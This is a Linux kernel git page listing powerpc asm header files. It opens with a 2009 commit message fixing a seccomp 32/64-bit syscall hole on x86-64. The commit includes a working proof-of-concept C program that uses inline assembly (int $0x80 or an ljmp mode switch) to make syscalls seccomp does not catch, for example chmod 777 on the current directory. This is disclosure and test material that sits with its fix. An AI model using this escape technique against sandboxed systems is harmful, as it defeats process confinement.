Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process can make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
iseries
8xx_immap.h
8253pit.h
abs_addr.h
agp.h
asm-compat.h
atomic.h atomic_t: unify all arch definitions 2009-01-06 15:59:10 -08:00
auxvec.h
backlight.h
bitops.h
bootx.h
btext.h
bug.h powerpc: Fix asm EMIT_BUG_ENTRY with !CONFIG_BUG 2008-12-16 15:53:23 +11:00
bugs.h
byteorder.h byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
cache.h
cacheflush.h
cell-pmu.h powerpc/oprofile: IBM CELL: add SPU event profiling support 2009-01-08 15:51:55 +01:00
cell-regs.h
checksum.h
clk_interface.h
code-patching.h
compat.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
cpm1.h
cpm2.h fs_enet: Fix SCC Ethernet on CPM2, and crash in fs_enet_rx_napi() 2008-08-27 05:16:38 -04:00
cpm.h
cputable.h powerpc/mm: Introduce MMU features 2008-12-21 14:21:16 +11:00
cputhreads.h
cputime.h
current.h
dbdma.h
dcr-generic.h
dcr-mmio.h
dcr-native.h powerpc/4xx: Extended DCR support v2 2008-12-21 14:21:15 +11:00
dcr-regs.h ibm_newemac: Fix EMAC soft reset on 460EX/GT 2008-10-08 15:27:14 -07:00
dcr.h powerpc: Const-qualify Device Node Argument to DCR Resource Extent API 2008-12-21 14:21:16 +11:00
delay.h
device.h powerpc and sparc: Introduce dev_archdata node accessors 2008-12-03 21:03:54 +11:00
disassemble.h ppc: Create disassemble.h to extract instruction fields 2008-12-31 16:52:21 +02:00
div64.h
dma-mapping.h powerpc: Fix !CONFIG_PPC_NEED_DMA_SYNC_OPS build warning 2008-12-16 14:39:33 +11:00
dma.h
edac.h
eeh_event.h
eeh.h powerpc/pci: Split pcibios_fixup_bus() into bus setup and device setup 2008-11-06 09:22:37 +11:00
elf.h [S390] arch_setup_additional_pages arguments 2008-12-25 13:38:54 +01:00
emergency-restart.h
errno.h
exception.h powerpc: Make it possible to move the interrupt handlers away from the kernel 2008-09-15 11:08:08 -07:00
fb.h
fcntl.h
feature-fixups.h powerpc/mm: Introduce MMU features 2008-12-21 14:21:16 +11:00
firmware.h
fixmap.h
floppy.h
fs_pd.h
fsl_gtm.h
fsl_lbc.h powerpc: fix fsl_upm nand driver modular build 2008-10-13 11:48:24 -05:00
ftrace.h powerpc/ppc64: ftrace, handle module trampolines for dyn ftrace 2008-11-20 10:52:28 -08:00
futex.h
gpio.h
grackle.h
hardirq.h
heathrow.h
highmem.h powerpc/44x: Support 16K/64K base page sizes on 44x 2008-12-29 09:53:25 +11:00
hugetlb.h mm: report the MMU pagesize in /proc/pid/smaps 2009-01-06 15:58:58 -08:00
hvcall.h powerpc: Make CMO paging space pool ID and page size available 2008-08-18 14:22:34 +10:00
hvconsole.h
hvcserver.h
hw_irq.h
hydra.h
i8259.h
ibmebus.h
ide.h cleanup powerpc/include/asm/ide.h 2008-08-18 21:40:03 +02:00
immap_86xx.h
immap_cpm2.h powerpc: Update QE/CPM2 usb_ctlr structures for USB support 2008-11-08 12:39:02 -06:00
immap_qe.h powerpc: Update QE/CPM2 usb_ctlr structures for USB support 2008-11-08 12:39:02 -06:00
io-defs.h
io.h powerpc: Remove dead BIO_VMERGE_BOUNDARY definition 2008-12-16 15:53:19 +11:00
ioctl.h
ioctls.h powerpc: Add ioctls for RS485 mode control of serial drivers 2009-01-08 16:25:12 +11:00
iommu.h powerpc: Update remaining dma_mapping_ops to use map/unmap_page 2008-10-31 16:13:48 +11:00
ipcbuf.h
ipic.h
irq_regs.h
irq.h powerpc: Separate the irq radix tree insertion and lookup 2008-09-15 11:08:44 -07:00
irqflags.h powerpc: Fix lockdep IRQ tracing bug 2008-08-18 14:22:34 +10:00
Kbuild byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
kdebug.h
kdump.h powerpc/32: Wire up the trampoline code for kdump 2008-12-23 15:13:29 +11:00
kexec.h powerpc/kdump: Use ppc_save_regs() in crash_setup_regs() 2009-01-08 16:25:17 +11:00
keylargo.h
kgdb.h
kmap_types.h
kprobes.h
kvm_44x.h KVM: ppc: save and restore guest mappings on context switch 2008-12-31 16:55:09 +02:00
kvm_asm.h
kvm_host.h KVM: ppc: mostly cosmetic updates to the exit timing accounting code 2008-12-31 16:55:41 +02:00
kvm_para.h
kvm_ppc.h KVM: ppc: directly insert shadow mappings into the hardware TLB 2008-12-31 16:55:09 +02:00
kvm.h
libata-portmap.h
linkage.h
lmb.h
local.h powerpc: Tell gcc when we clobber the carry in inline asm 2008-11-19 16:04:28 +11:00
lppaca.h powerpc: Update page-in counter for CMM 2008-11-05 22:08:28 +11:00
lv1call.h
machdep.h powerpc: Merge 32 and 64-bit dma code 2008-09-24 16:26:45 -05:00
macio.h
mc146818rtc.h
mediabay.h
mman.h powerpc: Get USE_STRICT_MM_TYPECHECKS working again 2008-10-14 10:35:27 +11:00
mmu_context.h powerpc/mm: Split mmu_context handling 2008-12-21 14:21:15 +11:00
mmu-8xx.h powerpc/mm: Rework context management for CPUs with no hash table 2008-12-21 14:21:15 +11:00
mmu-40x.h powerpc/mm: Rework context management for CPUs with no hash table 2008-12-21 14:21:15 +11:00
mmu-44x.h powerpc/44x: declare tlb_44x_index for use in C code 2008-12-31 16:55:09 +02:00
mmu-fsl-booke.h powerpc/mm: Rework context management for CPUs with no hash table 2008-12-21 14:21:15 +11:00
mmu-hash32.h
mmu-hash64.h powerpc set_huge_psize() false positive 2008-11-30 10:03:35 -08:00
mmu.h powerpc/mm: Add SMP support to no-hash TLB handling 2008-12-21 14:21:16 +11:00
mmzone.h
module.h powerpc/ppc32: ftrace, dynamic ftrace to handle modules 2008-11-20 10:52:53 -08:00
mpc6xx.h
mpc8xx.h
mpc52xx_psc.h powerpc/mpc5200: add rts/cts handling in PSC UART driver 2008-12-21 02:54:32 -07:00
mpc52xx.h powerpc/mpc5200: Document and tidy irq driver 2008-12-21 02:54:26 -07:00
mpc86xx.h
mpc512x.h
mpc8260.h
mpic.h powerpc/mpic: Fix regression caused by change of default IRQ affinity 2008-10-31 16:13:50 +11:00
msgbuf.h
msi_bitmap.h powerpc: Split-out common MSI bitmap logic into msi_bitmap.c 2008-08-20 16:34:57 +10:00
mutex.h powerpc: Optimise mutex 2008-11-19 16:04:58 +11:00
nvram.h
of_device.h powerpc: Remove include of linux/of_device.h from asm/of_device.h 2008-08-20 16:34:59 +10:00
of_platform.h powerpc: Remove include of linux/of_platform.h from asm/of_platform.h 2008-08-20 16:34:58 +10:00
ohare.h
oprofile_impl.h powerpc/oprofile: IBM CELL: add SPU event profiling support 2009-01-08 15:51:55 +01:00
paca.h powerpc: Make it possible to move the interrupt handlers away from the kernel 2008-09-15 11:08:08 -07:00
page_32.h powerpc/44x: Support 16K/64K base page sizes on 44x 2008-12-29 09:53:25 +11:00
page_64.h
page.h powerpc/44x: Support 16K/64K base page sizes on 44x 2008-12-29 09:53:25 +11:00
param.h
parport.h
pasemi_dma.h
pci-bridge.h powerpc: Introduce ppc_pci_flags accessors 2008-12-16 15:53:16 +11:00
pci.h powerpc: Introduce ppc_pci_flags accessors 2008-12-16 15:53:16 +11:00
percpu.h
pgalloc-32.h powerpc: Use RCU based pte freeing mechanism for all powerpc 2008-12-03 20:46:35 +11:00
pgalloc-64.h powerpc: Use RCU based pte freeing mechanism for all powerpc 2008-12-03 20:46:35 +11:00
pgalloc.h powerpc: Use RCU based pte freeing mechanism for all powerpc 2008-12-03 20:46:35 +11:00
pgtable-4k.h powerpc/mm: Fix _PAGE_CHG_MASK to protect _PAGE_SPECIAL 2009-02-13 16:37:44 +11:00
pgtable-64k.h powerpc/mm: Fix _PAGE_CHG_MASK to protect _PAGE_SPECIAL 2009-02-13 16:37:44 +11:00
pgtable-ppc32.h powerpc/mm: Fix _PAGE_CHG_MASK to protect _PAGE_SPECIAL 2009-02-13 16:37:44 +11:00
pgtable-ppc64.h powerpc/mm: Rework usage of _PAGE_COHERENT/NO_CACHE/GUARDED 2008-12-21 14:21:16 +11:00
pgtable.h powerpc/mm: Rework usage of _PAGE_COHERENT/NO_CACHE/GUARDED 2008-12-21 14:21:16 +11:00
phyp_dump.h
pmac_feature.h
pmac_low_i2c.h
pmac_pfunc.h
pmc.h
pmi.h
poll.h
posix_types.h
ppc4xx.h
ppc_asm.h powerpc/32: Add the ability for a classic ppc kernel to be loaded at 32M 2008-12-23 15:13:29 +11:00
ppc-pci.h
processor.h powerpc: Remove `have_of' global variable 2008-12-16 15:52:57 +11:00
prom.h powerpc: Add of_find_next_cache_node() 2008-12-21 14:21:14 +11:00
ps3.h powerpc/ps3: Use dma_addr_t down through the stack 2009-01-16 16:15:11 +11:00
ps3av.h powerpc/ps3: Replace the flip_ctl logic in ps3av and ps3fb by a mutex 2008-11-19 16:03:54 +11:00
ps3fb.h
ps3stor.h
pSeries_reconfig.h
ptrace.h remove __ARCH_WANT_COMPAT_SYS_PTRACE 2008-11-30 11:00:15 -08:00
qe_ic.h powerpc/qe: Fix few build errors with CONFIG_QUICC_ENGINE=n 2008-12-30 11:14:06 -06:00
qe.h powerpc/qe: add Ethernet UPSMR definitions to QE library 2009-01-07 09:18:53 -06:00
reg_8xx.h
reg_booke.h powerpc: Introduce local (non-broadcast) forms of tlb invalidates 2008-09-24 16:29:40 -05:00
reg_fsl_emb.h
reg.h powerpc: Prepare xmon_save_regs for use with kdump 2008-12-23 15:13:28 +11:00
resource.h
rheap.h
rio.h
rtas.h powerpc: Change u64/s64 to a long long integer type 2009-01-13 14:47:59 +11:00
rtc.h
rwsem.h
scatterlist.h
seccomp.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
sections.h Merge commit 'origin' 2008-10-15 11:31:54 +11:00
sembuf.h
serial.h
setjmp.h
setup.h
sfp-machine.h powerpc: Add SPE/EFP math emulation for E500v1/v2 processors. 2008-12-03 08:19:16 -06:00
shmbuf.h
shmparam.h
sigcontext.h
siginfo.h signals: demultiplexing SIGTRAP signal 2008-09-23 13:26:52 +02:00
signal.h x86, um: get rid of uml signal.h 2008-10-22 22:55:20 -07:00
smp.h powerpc: Provide a separate handler for each IPI action 2008-11-19 16:05:06 +11:00
smu.h
socket.h
sockios.h
sparsemem.h
spinlock_types.h
spinlock.h powerpc: Tell gcc when we clobber the carry in inline asm 2008-11-19 16:04:28 +11:00
spu_csa.h
spu_info.h
spu_priv1.h
spu.h powerpc/cell: Bitops work on unsigned longs 2009-01-08 16:25:12 +11:00
sstep.h
stat.h
statfs.h PowerPC: Use <asm-generic/statfs.h> 2008-09-06 19:30:15 +01:00
string.h
suspend.h
swab.h powerpc: introduce asm/swab.h 2009-01-06 18:10:27 -08:00
synch.h powerpc: Optimise smp_wmb 2008-11-19 16:04:55 +11:00
syscall.h
syscalls.h
systbl.h [CVE-2009-0029] Rename old_readdir to sys_old_readdir 2009-01-14 14:15:15 +01:00
system.h powerpc: Optimise smp_rmb 2008-11-19 16:04:57 +11:00
tce.h
termbits.h
termios.h
thread_info.h
time.h powerpc: Eliminate unused do_gtod variable 2008-11-06 09:49:28 +11:00
timex.h
tlb.h
tlbflush.h powerpc/mm: Split low level tlb invalidate for nohash processors 2008-12-21 14:21:16 +11:00
topology.h Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/rusty/linux-2.6-cpumask into merge-rr-cpumask 2009-01-03 18:53:31 +01:00
tsi108_irq.h
tsi108_pci.h
tsi108.h
types.h powerpc: Change u64/s64 to a long long integer type 2009-01-13 14:47:59 +11:00
uaccess.h
ucc_fast.h
ucc_slow.h
ucc.h
ucontext.h
udbg.h
uic.h
unaligned.h
uninorth.h
unistd.h
user.h
vdso_datapage.h powerpc: Improve resolution of VDSO clock_gettime 2008-11-06 09:49:22 +11:00
vdso.h
vga.h
vio.h
xilinx_intc.h
xmon.h
xor.h